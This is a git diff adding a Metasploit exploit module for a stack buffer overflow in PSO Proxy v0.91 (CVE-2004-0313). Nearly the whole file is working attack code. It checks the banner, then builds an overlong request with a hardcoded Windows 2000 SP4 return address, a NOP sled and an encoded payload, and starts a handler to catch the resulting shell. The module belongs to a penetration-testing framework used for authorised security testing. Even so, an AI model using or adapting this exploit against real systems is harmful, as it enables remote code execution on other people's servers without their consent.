diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb
new file mode 100644
index 0000000000..f809a6ecb9
--- /dev/null
+++ b/modules/exploits/windows/http/psoproxy91_overflow.rb
@@ -0,0 +1,90 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+module Msf
+
+class Exploits::Windows::Http::PSOProxy91_Overflow < Exploit::Remote
+
+	include Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'PSO Proxy v0.91 Stack Overflow',
+			'Description'    => %q{
+				This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
+				If a client sends an excessively long request the stack is overwritten.
+				You may need to rerun this exploit a few times before your payload is executed.
+				This module was ported from the original exploit by rave@rosiello.org.
+			},
+			'Author'         => 'Patrick Webster <patrick@aushack.com>',
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 4460 $',
+			'References'     => 
+				[ 
+					[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
+					[ 'CVE', '2004-0313' ],
+					[ 'BID', '9706' ],
+					[ 'OSVDB', '4028' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 350,
+					'BadChars' => "\x0a\x0d",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows 2000 SP4 English',
+					{
+						'Ret' => 0x7c57b842,# jmp ecx KERNEL32.DLL w2ksp4en
+					}
+					],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Feb 20 2004',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[ 
+				Opt::RPORT(8080),
+			], self.class)
+	end
+
+		def check 
+			connect
+			sock.put("GET / HTTP/1.0\r\n\r\n")
+			banner = sock.get(-1,3)
+			if (banner =~ /PSO Proxy 0\.9/)
+				return Exploit::CheckCode::Vulnerable
+			end
+			return Exploit::CheckCode::Safe
+		end
+
+		def exploit
+			print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") 
+			connect
+			exploit = rand_text_alphanumeric(1024, payload_badchars) 
+			exploit += [target['Ret']].pack('V') + make_nops(20) + payload.encoded
+			sock.put(exploit + "\r\n\r\n")
+			sleep(0.25)
+			print_status("Payload sent... if it didn't work try again!")
+			disconnect
+			handler
+		end
+	end
+end
+